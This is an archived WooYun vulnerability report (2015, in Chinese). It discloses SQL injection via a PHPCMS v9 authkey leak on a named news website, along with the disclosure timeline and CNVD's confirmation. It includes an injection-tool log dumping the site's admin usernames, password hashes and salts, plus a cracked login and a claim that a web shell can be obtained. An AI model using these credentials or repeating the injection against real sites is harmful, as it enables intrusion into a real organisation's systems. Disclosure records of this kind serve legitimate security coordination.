当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127098

漏洞标题:邳州新闻网sql注射可getshell

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-07-18 11:46

修复时间:2015-09-06 00:00

公开时间:2015-09-06 00:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-18: 细节已通知厂商并且等待厂商处理中
2015-07-22: 厂商已经确认,细节仅向厂商公开
2015-08-01: 细节向核心白帽子及相关领域专家公开
2015-08-11: 细节向普通白帽子公开
2015-08-21: 细节向实习白帽子公开
2015-09-06: 细节向公众公开

简要描述:

一点寒光万丈芒 屠尽天下又何妨 深埋不改凌锐志 一聚风云便是皇

详细说明:

站为PHPCMSv9.存在authkey泄露,可获取管理员密码,可getshell
参照: WooYun: PHPCMS最新版本authkey泄露可注射拿shell

1.png


网址:http://www.pznews.com

vwmcgevkwrndqfyuhtxa([",1Aigsx1Dy6RyPrxPpZtYDG5UkzHfXFKG,,,"])


漏洞证明:

本地搭建环境,直接注入即可:

Target:	http://localhost:8080/fuck.php?id=%Inject_Here%2
Date: 2015/7/16 10:17:35
DB Detection: MySQL (Auto Detected)
Method: GET
Type: String (Auto Detected)
Data Base: newsv99
Table: news_admin
Total Rows: 10
username password encrypt userid email
admin e86e4cc390dd37f75e5dc4f872ba511f bI8Gkr 1 [email protected]
chenxie af735ab0939604f3b39b14b554b231a8 4ejE1H 6 [email protected]
chenxie1 c849dc501ed32a2ad86a532a7a4f3918 WbDy23 16 [email protected]
jyq 5f3805b3fe0676b2e7deddca228ae828 mKBjMs 12 [email protected]
lcp da24b177f328f85f41a520f3d739ae07 P48Hvz 14 [email protected]
suowei f741621951bf55d9b6de925d55fb3c83 2K4zfy 2 [email protected]
syp 1e574b4666fb19b363f51c856ddefdf8 MepDmV 11 [email protected]
syp1 44212d80ad4631727d10a489ed4a8c97 4DdwNL 13 [email protected]
wqz cc87a5c5ee5b5af336fcd1945ad6ae0d PLs4aa 8 [email protected]
wuping 1ebaf8ecdcfa41e37490fa7adcf672d4 7ah6US 4 [email protected]


随便解密其中一个,登陆之:

chenxie / 123321


1.jpg

修复方案:

立即修复!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-22 08:40

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无